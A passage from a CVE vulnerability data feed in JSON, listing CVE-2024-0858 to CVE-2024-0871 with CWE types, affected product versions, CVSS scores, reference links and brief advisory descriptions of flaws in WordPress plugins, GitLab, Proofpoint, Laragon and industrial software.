}, "references" : { "reference_data" : [ { "url" : "https://www.usom.gov.tr/bildirim/tr-24-1011", "name" : "https://www.usom.gov.tr/bildirim/tr-24-1011", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.usom.gov.tr/bildirim/tr-24-1011", "name" : "https://www.usom.gov.tr/bildirim/tr-24-1011", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Universal Software Inc. FlexWater Corporate Water Management allows SQL Injection.This issue affects FlexWater Corporate Water Management: before 5.452.0." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:uni-yaz:flexwater_corporate_water_management:*:*:*:*:*:*:*:*", "versionEndExcluding" : "5.452.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-07-18T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0858", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/", "name" : "https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/", "name" : "https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Innovs HR WordPress plugin through 1.0.3.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding them as employees." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:theinnovs:innovs_hr:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.3.4", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-05-05T18:55Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0859", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php", "name" : "https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php", "name" : "https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.9.34", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0860", "ASSIGNER" : "ics-cert@hq.dhs.gov" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-319" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] }, { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13", "refsource" : "", "tags" : [ "Third Party Advisory", "US Government Resource" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nThe affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:softing:edgeaggregator:3.60:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:softing:edgeconnector:3.60:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-03-14T21:15Z", "lastModifiedDate" : "2025-01-23T19:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0861", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/439240", "name" : "GitLab Issue #439240", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/439240", "name" : "GitLab Issue #439240", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://hackerone.com/reports/2316435", "name" : "HackerOne Bug Bounty Report #2316435", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://hackerone.com/reports/2316435", "name" : "HackerOne Bug Bounty Report #2316435", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in GitLab EE affecting all versions starting from 16.4 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Users with the `Guest` role can change `Custom dashboard projects` settings contrary to permissions." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:16.9.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.8.0", "versionEndExcluding" : "16.8.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.4.0", "versionEndExcluding" : "16.7.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-22T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0862", "ASSIGNER" : "security@proofpoint.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2024-0001", "name" : "https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2024-0001", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2024-0001", "name" : "https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2024-0001", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Proofpoint Encryption endpoint of Proofpoint Enterprise Protection contains a Server-Side Request Forgery vulnerability that allows an authenticated user to relay HTTP requests from the Protection server to otherwise private network addresses." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0864", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2024/02/CVE-2024-0864", "name" : "https://cert.pl/en/posts/2024/02/CVE-2024-0864", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://cert.pl/en/posts/2024/02/CVE-2024-0864", "name" : "https://cert.pl/en/posts/2024/02/CVE-2024-0864", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://cert.pl/posts/2024/02/CVE-2024-0864", "name" : "https://cert.pl/posts/2024/02/CVE-2024-0864", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://cert.pl/posts/2024/02/CVE-2024-0864", "name" : "https://cert.pl/posts/2024/02/CVE-2024-0864", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://laragon.org/", "name" : "https://laragon.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://laragon.org/", "name" : "https://laragon.org/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Enabling Simple Ajax Uploader plugin included in Laragon open-source software allows for a remote code execution (RCE) attack via an improper input validation in a file_upload.php file which serves as an example.\nBy default, Laragon is not vulnerable until a user decides to use the aforementioned plugin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:laragon:laragon:*:*:*:*:*:*:*:*", "versionEndExcluding" : "7.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T13:15Z", "lastModifiedDate" : "2025-04-24T17:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0865", "ASSIGNER" : "cpcert@se.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-03.pdf", "name" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-03.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-03.pdf", "name" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-03&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-03.pdf", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CWE-798: Use of hard-coded credentials vulnerability exists that could cause local privilege\nescalation when logged in as a non-administrative user." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:schneider-electric:ecostruxure_it_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-12T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0866", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Check & Log Email plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 1.0.9 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-26T03:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0867", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027872%40email-log&new=3027872%40email-log&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/email-log/", "name" : "https://wordpress.org/plugins/email-log/", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/email-log/", "name" : "https://wordpress.org/plugins/email-log/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd15268f-7e06-4e0d-baaf-f27348af61ce?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Email Log plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 2.4.8 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-24T06:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0868", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/bb7c2d2b-cdfe-433b-96cf-714e71d12b22/", "name" : "https://wpscan.com/vulnerability/bb7c2d2b-cdfe-433b-96cf-714e71d12b22/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/bb7c2d2b-cdfe-433b-96cf-714e71d12b22/", "name" : "https://wpscan.com/vulnerability/bb7c2d2b-cdfe-433b-96cf-714e71d12b22/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The coreActivity: Activity Logging plugin for WordPress plugin before 2.1 retrieved IP addresses of requests via headers such X-FORWARDED to log them, allowing users to spoof them by providing an arbitrary value" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dev4press:coreactivity:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-17T05:15Z", "lastModifiedDate" : "2025-06-17T18:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0869", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91", "name" : "https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php", "name" : "https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/instant-images/", "name" : "https://wordpress.org/plugins/instant-images/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91", "name" : "https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/instant-images/", "name" : "https://wordpress.org/plugins/instant-images/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php", "name" : "https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:connekthq:instant_images_-_one_click_unsplash_uploads:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "6.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0870", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3084519/yith-woocommerce-gift-cards/trunk/includes/admin/class-ywgc-admin.php", "name" : "https://plugins.trac.wordpress.org/changeset/3084519/yith-woocommerce-gift-cards/trunk/includes/admin/class-ywgc-admin.php", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3084519/yith-woocommerce-gift-cards/trunk/includes/admin/class-ywgc-admin.php", "name" : "https://plugins.trac.wordpress.org/changeset/3084519/yith-woocommerce-gift-cards/trunk/includes/admin/class-ywgc-admin.php", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The YITH WooCommerce Gift Cards plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_mail_status' and 'save_email_settings' functions in all versions up to, and including, 4.12.0. This makes it possible for unauthenticated attackers to modify WooCommerce settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0871", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version", "name" : "https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version", "name" : "https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fastlinemedia:beaver_builder:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding" : "2.7.4.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-02T17:16Z" }, { "cve" : { "data_type" : 